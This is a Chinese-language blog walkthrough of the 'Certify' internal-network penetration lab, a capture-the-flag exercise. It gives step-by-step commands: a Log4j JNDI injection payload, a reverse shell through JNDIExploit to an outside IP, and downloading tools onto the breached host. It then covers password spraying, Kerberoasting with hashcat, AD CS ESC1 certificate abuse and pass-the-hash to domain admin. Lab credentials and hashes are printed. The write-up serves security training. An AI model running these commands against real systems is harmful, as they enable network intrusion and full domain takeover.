【内网渗透】最保姆级的春秋云镜Certify打靶笔记

于 2024-09-04 16:37:13 发布
阅读量238 收藏 2
点赞数 6
文章标签: 春秋云镜 certify 内网渗透 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/141891270
版权

目录

flag1

flag2 

flag3 

flag4

flag1

fscan扫外网

访问8983端口,发现配置项有log4j

【vulhub】Log4j2:CVE-2021-44228漏洞复现_vulhub cve-2021-44228-CSDN博客 

/solr/admin/collections?action=${jndi:ldap://z5o5w8.dnslog.cn}

dnslog测出可以打jndi 

java -jar JNDIExploit.jar -i 124.222.136.33

反弹shell,sudo grc提权

 

flag2 

切到/tmp目录wget下载fscan和frp,搭代理,扫内网

172.22.9.7 XIAORANG-DC

172.22.9.19 已拿下

172.22.9.26 DESKTOP-CBKTVMO

172.22.9.47 fileserver  

fileserver可以smbclient直连上去

proxychains4 impacket-smbclient 172.22.9.47

拿到personnel.db和flag02.txt

 

 

flag3 

用navicat打开personnel.db文件

一张导出为username.txt

 

一张导出为password.txt

 

 

处理一下导出文件内容的双引号

import sys

# 检查是否提供了文件名参数
if len(sys.argv) != 2:
    print("Usage: python eraser.py <filename>")
    sys.exit(1)

# 获取命令行参数中的文件名
filename = sys.argv[1]

# 读取文件内容
with open(filename, 'r', encoding='utf-8') as file:
    content = file.read()

# 删除所有双引号
content = content.replace('"', '')

# 将处理后的内容写回原文件
with open(filename, 'w', encoding='utf-8') as file:
    file.write(content)

print(f"所有双引号已删除,并将结果保存回 {filename}")

密码喷洒一下 

proxychains4 crackmapexec smb 172.22.9.26 -u username.txt -p password.txt --continue-on-success

 爆出来两个

xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\liupeng:fiAzGwEMgTY 

 两个rdp都失败了,flag2提示打SPN

proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY

得到zhangxia和chenchen的密码哈希,分别hashcat爆一下 

hashcat -a 0 -m 13100 hash.txt ./rockyou.txt

 

xiaorang.lab\zhangxia MyPass2@@6
xiaorang.lab\chenchen @Passw0rd@

再rdp连上去,发现什么都没有

查看证书情况

proxychains4 certipy-ad find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

改一下/etc/hosts,避免超时

利用 ESC1

proxychains4 certipy-ad req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

 

拿到生成的administrator.pfx获取域管哈希

proxychains4 certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7

pth拿域管

proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.26
type c:\users\administrator\flag\flag03.txt

flag4

proxychains4 impacket-smbexec -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/administrator@172.22.9.7
atype c:\users\administrator\flag\flag04.txt

Z3r4y
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SYNPLICITY的CERTIFY软件全面支持XILINX VIRTEX-5 FPGA
12-02
SYNPLICITY的Certify软件是一款专为ASIC RTL原型设计打造的工具,它全面支持Xilinx Virtex-5系列的65纳米FPGA。这一增强意味着设计者现在能够利用Virtex-5 FPGA的高性能、高容量和灵活性来构建ASIC原型,而不再局限...
certify
03-22
如果证书未按预期更新 假设您使用postal启动了容器,并且您是docker组的成员,请通过运行以下命令输入容器 postal enter certbot 要快速检查证书的到期日期,请运行 certbot certificates 在容器内,“让我们加密”...
春秋云镜-Certify-Writeup
qq_35607078的博客
07-12 277
春秋云镜-Certify-Writeup
春秋云境 Certify WP
m0_62466350的博客
01-18 1358
本文首发作者博客园Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
内网渗透技巧大全
黑战士的博客
04-28 1417
对于内部帐户,SPN将自动进行注册。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system。安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。
春秋云镜-【仿真场景】Certify writeup
渗透测试研究中心
03-07 1184
说明Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术Solr、AD CS、SMB、Kerberos、域渗透第一个flaglog4j RCE扫描外网IP发现solr存在log4j的组件,测试...
应用手册How to Certify Your Bluetooth Product-综合文档
05-22
应用手册How to Certify Your Bluetooth Product
SYNPLICITY的CERTIFY软件全面支持XILINX VIRTEX-5 FPGA..
12-03
SYNPLICITY的Certify软件是一款专为ASIC RTL原型设计打造的工具,它在行业内率先实现了对多个FPGA的支持,特别是在Xilinx Virtex-5系列65纳米FPGA上的全面兼容。这一支持使得设计者能充分利用Virtex-5 FPGA的高性能...
应用手册How to Certify Your Bluetooth Product.pdf-综合文档
05-24
### 如何认证您的蓝牙产品——全面指南 #### 引言 在当今的互联世界中,蓝牙技术已成为无线通信的关键组成部分,被广泛应用于各种消费电子产品、医疗设备和工业解决方案中。对于那些希望在市场上推出包含德州仪器...
【中科院1区】Matlab实现哈里斯鹰优化算法HHO-SAE实现故障诊断算法研究.rar
09-03
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
A_Chrome_extension(mv3)_to_switch_between_differen_MapS
09-03
A_Chrome_extension(mv3)_to_switch_between_differen_MapSwitcher
C++的算法题合集.zip
09-03
c++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zipc++的算法题合集.zip
thulac:清华大学自然语言处理与社会人文计算实验室研制推出的一套中文词法分析工具包
09-03
thulac(Python实现):清华大学自然语言处理与社会人文计算实验室研制推出的一套中文词法分析工具包 THULAC(THU Lexical Analyzer for Chinese)由清华大学自然语言处理与社会人文计算实验室研制推出的一套中文词法分析工具包,具有中文分词和词性标注功能。THULAC具有如下几个特点: 能力强。利用我们集成的目前世界上规模最大的人工分词和词性标注中文语料库(约含5800万字)训练而成,模型标注能力强大。 准确率高。该工具包在标准数据集Chinese Treebank(CTB5)上分词的F1值可达97.3%,词性标注的F1值可达到92.9%,与该数据集上最好方法效果相当。 速度较快。同时进行分词和词性标注速度为300KB/s,每秒可处理约15万字。只进行分词速度可达到1.3MB/s。
Elasticsearch的Restful风格API
09-03
Elasticsearch的Restful风格API
FSCapture-v9.6 快捷录屏
09-03
高质量录屏软件,使用方便快捷,内涵使用手册
Idea 控制台出现乱码问题的4种解决方案.docx
09-03
IntelliJ IDEA 如果不进行相关设置,可能会导致控制台中文乱码、配置文件中文乱码等问题,非常影响编码过程中进行问题追踪。本文总结了 IDEA 中常见的中文乱码解决方法。 ***********使用idea进行maven项目的编译时,控制台输出中文的时候出现乱码的情况。 ***********通常出现这样的问题,都是因为编码格式不一样导致的。既然是maven出的问题,我们在idea中查找下看可以如何设置文件编码。 搜索栏搜索“ Maven ”,在其子选项中选择“ Runner ”,在界面右侧中“ VM options ”文本框中输入以下代码: -Dfile.encoding=UTF-8 或者 -Dfile.encoding=GB2312
基于Springboot的经方药食两用服务平台+源代码+演示视频.zip
09-03
近年来,信息化管理行业的不断兴起,使得人们的日常生活越来越离不开计算机和互联网技术。首先,根据收集到的用户需求分析,对设计系统有一个初步的认识与了解,确定经方药食两用服务平台的总体功能模块。然后,详细设计系统的主要功能模块,通过数据库设计过程将相关的数据信息存储到数据库中,再通过使用关键的开发工具,如IDEA开发平台、AJAX技术等,编码设计相关的功能模块。接着,主要采用功能测试的方式对系统进行测试,找出系统在运行过程中存在的问题,以及解决问题的方法,不断地改进和完善系统的设计。最后,总结本文介绍的系统的设计和实现过程,并且针对于系统的开发提出未来的展望工作。本系统的研发具有重大的意义,在安全性方面,用户使用浏览器访问网站时,采用注册和密码等相关的保护措施,提高系统的可靠性,维护用户的个人信息和财产的安全。在方便性方面,促进了经方药食两用服务平台的信息化建设,极大的方便了相关的工作人员对经方药食两用服务平台信息进行管理。 关键词:经方药食两用服务平台管理;Java语言;B/S模式;AJAX技术;系统测试
3C手机商城小程序(源码).zip
最新发布
09-03
3C手机商城小程序(源码).zip
certify-swiper7.zip
09-17
Certify-swiper7.zip是一个可能是一个压缩文件的命名。根据名称中的"certify",可以推测这个文件可能与认证有关。同时,"swiper7"这个词可能与一些滑块(slider)的功能或版本有关。 根据文件的后缀为.zip,可以推断出这是一个压缩文件。压缩文件经常用于打包和压缩多个文件或文件夹,以减少文件的大小,并将其用于传输或存储目的。在这种情况下,certify-swiper7.zip可能包含一些认证相关的文件或文件夹。 为了详细了解certify-swiper7.zip的内容,需要解压缩这个文件。可以使用解压缩软件(如WinRAR、7-Zip等)来打开并解压这个文件。解压缩后,我们可以查看文件和文件夹的结构,以了解其内容。 解压缩后,我们可以进一步查看certify-swiper7.zip的内容。如果这个压缩文件确实与认证有关,其中可能包含认证证书、授权文件、代码库或认证相关的文档。这些文件可以帮助用户了解如何认证某个产品、服务或系统。 综上所述,certify-swiper7.zip可能是一个包含认证相关文件的压缩文件。为了详细了解其内容,需要解压缩这个文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值